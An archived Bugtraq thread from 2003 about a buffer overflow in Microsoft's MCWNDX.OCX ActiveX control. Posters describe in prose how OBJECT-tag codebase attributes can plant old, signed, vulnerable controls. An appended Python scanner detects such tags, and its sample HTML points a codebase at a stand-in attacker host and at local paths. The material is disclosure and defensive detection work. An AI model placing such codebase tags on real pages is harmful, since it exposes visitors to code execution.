Bugtraq mailing list archives

RE: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer overflow
From: "Jason Coombs" <jasonc () science org>
Date: Wed, 13 Aug 2003 09:36:25 -1000

What about pointing the OBJECT tag codebase to a known, or probable, location
on the victim's own hard drive?

ActiveX never implemented any type of "same origin policy" the way JavaScript
does, so a local codebase reference should work as a technique to silently
activate any Microsoft-signed ActiveX control.

But I could be mistaken; this is commentary from memory, not experimental

I'd much rather spend my time conducting security audits of Linux and trying
to help those companies threatened by SCO's copyright claims defend themselves
in court.

Jason Coombs
jasonc () science org

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Thor Larholm
Sent: Wednesday, August 13, 2003 8:22 AM
To: Tri Huynh; bugtraq () securityfocus com
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-Disclosure] Microsoft MCWNDX.OCX ActiveX buffer

The MCWNDX.OCX binary is digitally signed by Microsoft, and as such you can
plant it on the user's machine just by pointing the codebase attribute of your
OBJECT tag to an archived copy of the file on your own server.

This also applies to other outdated ActiveX controls: even when a newer
(patched) version exists and is installed on the user's machine, you can still
re-introduce the old, buggy version since it is digitally signed by Microsoft.

Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
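The thread turns on one HTML detail: the `codebase` attribute of an OBJECT tag tells the browser where to fetch a control from, and the two messages discuss pointing it at a remote archive of a signed-but-outdated control or at a path on the local disk. As an added example that is not part of the thread or of either author's work, the following Python check does what a defender's content filter or mail gateway would do with that detail: parse incoming HTML, find every OBJECT tag carrying a `codebase`, and classify the target as remote, local (file: URL, drive letter or UNC path) or relative, also noting whether a `#version=` suffix requests a particular control version. The sample HTML, hostnames and CLSIDs are constructed placeholders; only the MCWNDX.OCX file name comes from the thread.

```python
"""Flag OBJECT tags whose codebase attribute directs an ActiveX install.

Added example for the Bugtraq thread above; not code from the thread or its
authors. Sample input, CLSIDs and hostnames are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Drive-letter (C:\ or C:/) or UNC (\\server\share) paths on the victim's disk.
LOCAL_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\)")

# Constructed sample page: one remote archive, two local references, one
# harmless OBJECT without a codebase. The CLSIDs are placeholders, not real ones.
SAMPLE_HTML = """
<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://attacker.example/archive/MCWNDX.OCX#version=1,0,0,0"></object>
<object classid="clsid:11111111-1111-1111-1111-111111111111"
        codebase="file:///C:/Windows/System32/mcwndx.ocx"></object>
<object classid="clsid:22222222-2222-2222-2222-222222222222"
        codebase="C:\\Program Files\\Common Files\\example.ocx"></object>
<object data="movie.swf" type="application/x-shockwave-flash"></object>
</body></html>
"""


def classify_codebase(codebase: str) -> str:
    """Return 'local-codebase', 'remote-codebase' or 'relative-codebase'."""
    # Strip the optional '#version=a,b,c,d' suffix before looking at the location.
    location = codebase.split("#", 1)[0].strip()
    parts = urlsplit(location)
    if parts.scheme == "file" or LOCAL_PATH.match(location):
        return "local-codebase"
    if parts.scheme in ("http", "https", "ftp") and parts.netloc:
        return "remote-codebase"
    return "relative-codebase"


class ObjectTagScanner(HTMLParser):
    """Collect every <object> start tag that carries a codebase attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[dict] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag != "object":  # HTMLParser already lower-cases tag names
            return
        attributes = {name.lower(): (value or "") for name, value in attrs}
        if "codebase" not in attributes:
            return  # no install location given; nothing to flag here
        codebase = attributes["codebase"]
        self.findings.append({
            "classid": attributes.get("classid", ""),
            "codebase": codebase,
            "kind": classify_codebase(codebase),
            "requests_version": "#version=" in codebase.lower(),
        })


def scan_html(html: str) -> list:
    """Parse an HTML document and return the flagged OBJECT tags in page order."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(f"{finding['kind']:17} version-pinned={finding['requests_version']!s:5} "
              f"{finding['classid']} <- {finding['codebase']}")
```

A real filter would combine the `remote-codebase` verdict with an allow-list of trusted download hosts and treat any `local-codebase` value as suspicious outright, since a legitimate page has no reason to ask the browser to load a control from the visitor's own disk.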
